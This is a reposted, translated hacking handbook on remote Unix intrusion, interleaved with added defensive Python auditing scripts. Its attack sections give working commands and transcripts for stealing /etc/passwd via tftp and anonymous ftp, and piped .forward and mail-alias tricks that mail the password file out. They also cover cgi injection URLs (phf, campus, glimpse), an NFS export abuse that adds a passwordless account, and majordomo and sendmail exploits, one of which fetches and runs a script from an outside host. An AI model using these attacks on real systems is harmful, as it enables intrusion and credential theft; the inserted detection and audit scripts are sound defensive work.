Practical Network Intrusion Tactics Handbook alpha (2)

Reposted from the Internet

II. Striking the ox through the mountain (remote attacks)
1) Taking things from afar: obtaining passwd
1.1) tftp

# tftp numen
tftp> get /etc/passwd
Error code 2: Access violation
tftp> get /etc/shadow
Error code 2: Access violation
tftp> quit

(samsa: nothing gained, but...)

# tftp sun8
tftp> get /etc/passwd
Received 965 bytes in 0.1 seconds
tftp> get /etc/shadow
Error code 2: Access violation

(samsa: success!!! ;-)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
ylx:x:10007:10::/users/ylx:/bin/sh
wzhou:x:10020:10::/users/wzhou:/bin/sh
wzhang:x:10101:4:Walt Whiteman:/users/wzhang:/sbin/sh

(samsa: a pity it is shadowed :-/)

1.2) Anonymous ftp
1.2.1) Direct retrieval

# ftp sun8
Connected to sun8.
220 sun8 FTP server (UNIX(r) System V Release 4.0) ready.
Name (sun8:root): anonymous
331 Guest login ok, send ident as password.
Password:

(samsa: your e-mail address, which of course is fake :->)

230 Guest login ok, access restrictions apply.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34243) (0 bytes).
bin
dev
etc
incoming
pub
usr
226 ASCII Transfer complete.
35 bytes received in 0.85 seconds (0.04 Kbytes/s)
ftp> cd etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (192.168.0.198,34244) (0 bytes).
group
passwd
226 ASCII Transfer complete.
15 bytes received in 0.083 seconds (0.18 Kbytes/s)
ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (192.168.0.198,34245) (223 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
231 bytes received in 0.038 seconds (5.98 Kbytes/s)

# cat passwd
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nobody:x:60001:60001:Nobody:/:
ftp:x:210:12::/export/ftp:/bin/false

(samsa: as expected! Too few fools leave the complete passwd in the anonymous ftp directory)
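The two passwd dumps in 1.1 and 1.2.1 are worth auditing rather than just reading: the tftp copy lists a second UID 0 account (smtp), and the NFS section later on this page appends a shadow entry with an empty password field. The following Python script is an added example, not part of the original handbook; it parses passwd and shadow content (constructed samples modelled on the dumps above, with placeholder hashes) and reports UID 0 accounts other than root, UIDs shared by several accounts, hashes left in the world-readable passwd instead of shadow, and empty password fields.

```python
"""Audit passwd/shadow content for the weaknesses the dumps in sections 1.1 and 1.2.1 show."""

# Constructed sample modelled on the tftp passwd dump above: it keeps the second
# UID-0 entry ('smtp') that the real dump contains and adds one unshadowed hash.
SAMPLE_PASSWD = """\
root:x:0:0:Super-User:/:/bin/ksh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:/bin/sh
adm:x:4:4:Admin:/var/adm:
smtp:x:0:0:Mail Daemon User:/:
nobody:x:60001:60001:Nobody:/:
legacy:$1$constructed$notarealhash:10050:10::/users/legacy:/bin/sh
ylx:x:10007:10::/users/ylx:/bin/sh
"""

# Constructed sample shadow file; 'zw' has the empty password field that the
# entry appended in section 1.4.2 of this page produces. Hashes are placeholders.
SAMPLE_SHADOW = """\
root:$5$constructed$notarealhash:10000::::::
ylx:$5$constructed$notarealhash:10000::::::
zw:::::::::
"""


def parse_colon_file(text, min_fields):
    """Split a colon-separated file into (lineno, fields); malformed lines get fields=None."""
    rows = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        rows.append((lineno, fields if len(fields) >= min_fields else None))
    return rows


def is_shadowed_or_locked(pw):
    """'x' means the hash lives in shadow; '*' / '!' prefixes mark locked accounts."""
    return pw == "x" or pw.startswith(("*", "!"))


def audit_passwd(text):
    findings = []
    uid_owners = {}
    for lineno, fields in parse_colon_file(text, 7):
        if fields is None:
            findings.append(f"passwd line {lineno}: malformed entry")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(f"passwd {name}: empty password field (no password needed to log in)")
        elif not is_shadowed_or_locked(pw):
            findings.append(f"passwd {name}: password hash stored in world-readable passwd, not in shadow")
        if uid == "0" and name != "root":
            findings.append(f"passwd {name}: UID 0 account other than root")
        uid_owners.setdefault(uid, []).append(name)
    for uid, names in uid_owners.items():
        if len(names) > 1:
            findings.append(f"passwd: UID {uid} shared by {', '.join(names)}")
    return findings


def audit_shadow(text):
    findings = []
    for lineno, fields in parse_colon_file(text, 2):
        if fields is None:
            findings.append(f"shadow line {lineno}: malformed entry")
            continue
        name, pw = fields[0], fields[1]
        if pw == "":
            findings.append(f"shadow {name}: empty password field (login without a password)")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_shadow(SAMPLE_SHADOW):
        print(finding)
```

Run against real files, the same two functions take the contents of /etc/passwd and /etc/shadow; the smtp entry in the dump above would be reported twice, once as a non-root UID 0 account and once as a UID shared with root.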

1.2.2) ftp home directory writable

# cat forward_sucker_file
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]"
# ftp victim.com
Connected to victim.com
220 victim FTP server ready.
Name (victim.com:zen): ftp
331 Guest login ok, send ident as password.
Password:[your e-mail address:forged]
230 Guest login ok, access restrictions apply.
ftp> put forward_sucker_file .forward
43 bytes sent in 0.0015 seconds (28 Kbytes/s)
ftp> quit
# echo test | mail [email protected]

(samsa: now wait for the passwd file to arrive by mail...)

1.3) WWW
The famous cgi bugs
1.3.1) phf
http://silly.com/cgi-bin/nph-test-cgi?*
http://silly.com/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
1.3.2) campus
http://silly.edu/cgi-bin/campus?%0a/bin/cat%0a/etc/passwd
1.3.3) glimpse
http://silly.com/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me\@my.e-mail.
addr\
(samsa: the line was too long so I folded it; no harm done, right? ;-)
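All three cgi URLs above work by smuggling a newline (%0a) or shell metacharacters through the query string, and that same property makes the requests easy to pick out of a web server's access log. The script below is an added example, not from the original handbook; it runs over a few constructed Common Log Format lines (invented addresses and timestamps), percent-decodes each request path repeatedly so that a double-encoded %250a is still recognised as a newline, and flags cgi-bin requests that carry newline or shell metacharacters or that name /etc/passwd or /etc/shadow.

```python
"""Spot cgi-bin requests carrying newline or shell metacharacters in the query (sections 1.3.x)."""
import re
from urllib.parse import unquote

# Constructed Common Log Format lines; addresses and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [11/May/1999:10:01:02 +0800] "GET /cgi-bin/phf?Qalias=x%0aless%20/etc/passwd HTTP/1.0" 200 1456
10.0.0.6 - - [11/May/1999:10:01:05 +0800] "GET /cgi-bin/phf?Qalias=jdoe HTTP/1.0" 200 512
10.0.0.7 - - [11/May/1999:10:02:11 +0800] "GET /cgi-bin/campus?%250a/bin/cat%250a/etc/passwd HTTP/1.0" 404 230
10.0.0.8 - - [11/May/1999:10:03:40 +0800] "GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5me HTTP/1.0" 500 0
10.0.0.9 - - [11/May/1999:10:04:00 +0800] "GET /index.html?q=a%0ab HTTP/1.0" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Newline, carriage return, pipe, semicolon and backtick are what the phf,
# campus and aglimpse requests above rely on.
META_RE = re.compile(r"[\n\r|;`]")
SENSITIVE = ("/etc/passwd", "/etc/shadow")


def fully_decode(s, max_rounds=3):
    """Percent-decode until the string stops changing, so %250a is seen as a newline."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def inspect_request(path):
    """Return the reasons a request path looks like a cgi injection attempt ([] if none).

    Only /cgi-bin/ is inspected here because that is where the scripts in this
    section live; widen the prefix check for other CGI locations.
    """
    if not path.startswith("/cgi-bin/"):
        return []
    decoded = fully_decode(path)
    reasons = []
    if META_RE.search(decoded):
        reasons.append("newline or shell metacharacter in request")
    reasons.extend(f"references {s}" for s in SENSITIVE if s in decoded)
    return reasons


def scan_log(text):
    """Return [(client_ip, raw_path, reasons)] for every suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = inspect_request(m["path"])
        if reasons:
            hits.append((m["ip"], m["path"], reasons))
    return hits


if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, path, "; ".join(reasons))
```

Of the five constructed lines, three are flagged: the phf and campus requests both for the newline and for naming /etc/passwd, the aglimpse request for the pipe and semicolon. The plain phf lookup and the non-CGI request are left alone.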

1.4) nfs
1.4.1) If /etc is exported, nothing more needs to be said
1.4.2) If some user's home directory is exported

# showmount -e numen
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
# mount -F nfs numen:/space/users/zw /mnt
# cd /mnt
# ls -ld .
drwxr-xr-x 6 1005 staff 2560 1999 5月 11 .
# echo zw:x:1005:1:temporary break-in account:/:/bin/sh >> /etc/passwd
# echo zw::::::::: >> /etc/shadow
# su zw
$ cat >.forward
"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]"
^D
# echo test | mail zw@numen

(samsa: wait for your mail....)
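The showmount -e output in 1.4.2 already contained the whole finding: a home directory exported to (everyone), which lets root on any client impersonate the owner's UID. The script below is an added example, not part of the original handbook; it parses output in that format (a constructed sample; the `*` token that Linux showmount prints for world exports is handled too) and reports exports open to every host, exports of / or /etc, and exported home directories. The list of home directory roots is an assumption to adjust per site.

```python
"""Audit NFS export lists for world exports and sensitive paths (section 1.4)."""

# Constructed output in the `showmount -e` format shown in section 1.4.2.
SAMPLE_SHOWMOUNT = """\
export list for numen:
/space/users/lpf sun9
/space/users/zw (everyone)
/etc sun9,sun10
/export/home (everyone)
"""

# Assumed home directory roots; adjust for the site being audited.
HOME_PREFIXES = ("/home", "/export/home", "/users", "/space/users")
# Solaris prints (everyone) for an unrestricted export; Linux showmount prints *.
WORLD_TOKENS = ("(everyone)", "*")


def parse_showmount(text):
    """Return [(path, client_spec)] from showmount -e output, skipping the header line."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list for"):
            continue
        parts = line.split(None, 1)
        path = parts[0]
        # A path with no client list at all is treated as open to everyone.
        clients = parts[1].strip() if len(parts) > 1 else "(everyone)"
        exports.append((path, clients))
    return exports


def is_home_export(path):
    return any(path == p or path.startswith(p + "/") for p in HOME_PREFIXES)


def audit_exports(text):
    findings = []
    for path, clients in parse_showmount(text):
        if clients in WORLD_TOKENS:
            findings.append(f"{path}: exported to every host")
        if path == "/" or path == "/etc" or path.startswith("/etc/"):
            findings.append(f"{path}: system directory exported (clients: {clients})")
        elif is_home_export(path):
            findings.append(
                f"{path}: home directory exported (clients: {clients}); "
                "root on any listed client can act as the owner's UID and write a .forward"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_exports(SAMPLE_SHOWMOUNT):
        print(finding)
```

The constructed sample yields six findings: two world exports, one system directory, and three home directory exports (one of them restricted to a single client, which is still worth knowing about, since the client's root can assume the owner's UID).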

1.5) sniffer
Exploiting the broadcast nature of Ethernet, eavesdrop on the IP packets passing over the network and thereby obtain passwords.
For the principles and technical details of sniffers, see [samsa 1999].

(samsa: not very interesting; it feels a bit like ``winning without honour''...)

1.6) NIS
1.6.1) Guess the domain name, then use ypcat (or, for NIS+, niscat) to obtain passwd (even shadow)
1.6.2) If you can control the NIS server, you can create a mail alias

nis-master # echo 'foo: "| mail [email protected] > /etc/aliases
nis-master # cd /var/yp
nis-master # make aliases
nis-master # echo test | mail -v [email protected]
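Sections 1.2.2, 1.4.2 and 1.6.2 all end the same way: a .forward file or an aliases entry whose target begins with a pipe, so that delivering a message runs a program. Scanning the aliases file and users' .forward files for such targets is the matching defensive check. The script below is an added example, not part of the original handbook; it parses a constructed sendmail-style aliases file (including a continuation line) and constructed .forward contents, and reports every pipe target whose program is not on a hypothetical allow-list of programs that are expected to receive piped mail.

```python
"""Find aliases and .forward entries that pipe mail into a program (sections 1.2.2, 1.4.2, 1.6.2)."""

# Constructed sendmail-style aliases file; the 'foo' entry has the shape of the
# pipe alias created in section 1.6.2, 'support' spans a continuation line.
SAMPLE_ALIASES = """\
# constructed sample
postmaster: root
foo: "| mail someone@example.invalid"
support: alice,
    bob
nobody: /dev/null
owner-list: "|/usr/local/bin/majordomo/wrapper majordomo"
"""

# Constructed .forward contents keyed by path; zw's mirrors the .forward from 1.4.2.
SAMPLE_FORWARDS = {
    "/users/zw/.forward": '"| /bin/cat /etc/passwd|sed \'s/^/ /\'|/bin/mail someone@example.invalid"\n',
    "/users/ylx/.forward": "ylx@mail.example.invalid\n",
}

# Hypothetical allow-list: programs a site knowingly lets mail be piped into.
ALLOWED_PROGRAMS = {"/usr/local/bin/majordomo/wrapper"}


def split_targets(rhs):
    """Split an alias right-hand side on commas that are outside double quotes."""
    targets, buf, in_quote = [], [], False
    for ch in rhs:
        if ch == '"':
            in_quote = not in_quote
        if ch == "," and not in_quote:
            targets.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    if buf:
        targets.append("".join(buf).strip())
    return [t for t in targets if t]


def parse_aliases(text):
    """Return [(alias, [targets])] from an aliases file, joining indented continuation lines."""
    entries = []
    current = None
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        if raw[0] in " \t" and current is not None:
            current[1] += raw.strip()
            continue
        name, _, rhs = raw.partition(":")
        current = [name.strip(), rhs.strip()]
        entries.append(current)
    return [(name, split_targets(rhs)) for name, rhs in entries]


def pipe_program(target):
    """Return the program a pipe target runs, or None if the target is not a pipe."""
    t = target.strip().strip('"').strip()
    if not t.startswith("|"):
        return None
    cmd = t[1:].strip()
    return cmd.split()[0] if cmd else ""


def audit_aliases(text, allowed=ALLOWED_PROGRAMS):
    findings = []
    for alias, targets in parse_aliases(text):
        for target in targets:
            prog = pipe_program(target)
            if prog is not None and prog not in allowed:
                findings.append(f"alias {alias!r} pipes mail to {prog}")
    return findings


def audit_forwards(files, allowed=ALLOWED_PROGRAMS):
    """files maps a .forward path to its contents; each line follows the aliases syntax."""
    findings = []
    for path, content in files.items():
        for line in content.splitlines():
            for target in split_targets(line):
                prog = pipe_program(target)
                if prog is not None and prog not in allowed:
                    findings.append(f"{path} pipes mail to {prog}")
    return findings


if __name__ == "__main__":
    for finding in audit_aliases(SAMPLE_ALIASES) + audit_forwards(SAMPLE_FORWARDS):
        print(finding)
```

On the constructed input the majordomo wrapper is accepted because it is allow-listed, while the 'foo' alias and zw's .forward are reported. On a real host the same check should also cover files that aliases pull in through :include:, and any .forward should be owned by the user and not writable by anyone else, which is the condition section 1.2.2 depends on.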


1.7) e-mail
e.g. exploiting the vulnerability in majordomo (ver. 1.94.3)
Reply-to: a~.`/usr/bin/rcp\${IFS}[email protected]:script\${IFS}/tmp/script;;source\${IFS}/tmp/script`.q~a/ad=cucu/c=scapegoat\\\@his.e-mail


# cat script
/bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail [email protected]
#

1.8) sendmail
Exploiting the vulnerability in sendmail 5.55:

# telnet victim.com 25
Trying xxx.xxx.xxx.xxx...
Connected to victim.com
Escape character is '^]'.
220 victim.com Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail [email protected]
250 "|/bin/mail [email protected]
rcpt to: nosuchuser
550 nosuchuser... User unknown
data
354 Enter mail, end with "." on a line by itself
..
250 Mail accepted
quit
Connection closed by foreign host.

(samsa:wait...)

By tony
